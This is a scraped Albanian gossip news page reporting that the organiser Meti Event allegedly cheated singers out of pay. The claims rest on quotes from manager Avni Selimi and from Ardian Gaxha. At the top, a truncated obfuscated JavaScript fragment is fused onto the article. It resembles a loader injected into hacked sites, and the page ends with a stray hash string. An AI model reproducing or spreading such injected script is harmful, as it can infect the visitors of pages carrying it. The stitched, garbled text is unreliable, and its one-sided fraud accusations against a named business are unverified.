;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Meti Event është mashtrues që nuk i paguan këngëtarët, ja faktet (FOTO)

By

Pas publikimit të pavërtetave nga Meti Event kinse Ledri nuk do të këndoj në Hanover për shkak të Noyzit, dalin në shesh të vërteta tjera lidhur me mashtrimit që i bëri ky organizim me këngëtarët shqiptarë.

Më herët u raportua  se ishin pikërisht dallaveret e Meti Event që kanë shtyrë menaxhmentin e Ledrit ta anulojë përformimin në Hanover, derisa tash dalin këngëtarë dhe menaxherë që konfirmojnë parregullësitë e Metit…

Menaxheri më i njohur në diasporë, Avni Selimi thotë për Indeksonline se  këngëtarët nuk janë paguar nga Meti Event.

“Meti Event ka mashtruar se të nesërmen i dërgon të hollat, se kinse nuk ka mundur t’i tërheqë para 24 orësh nga bankomati, ndërsa tash thotë t’i jap pjesë-pjesë”, thotë Selimi.

Në anën tjetër ka reaguar edhe Ardian Gaxha, i cili thotë askush nuk duhet lejuar që të mashtrojë me këngëtarët që punojmë që 20 vjet.

“Ka kaluar koha e rrëncakëve në këtë biznes, shkurt edhe efekt”, thotë Ardian Gaxha./PRIVE.AL/

5638a376237fb68c19368ffd1f73a93a9f45c57fcd2bf37024ffd4030d617d06_full

Artikuj të ngjashëm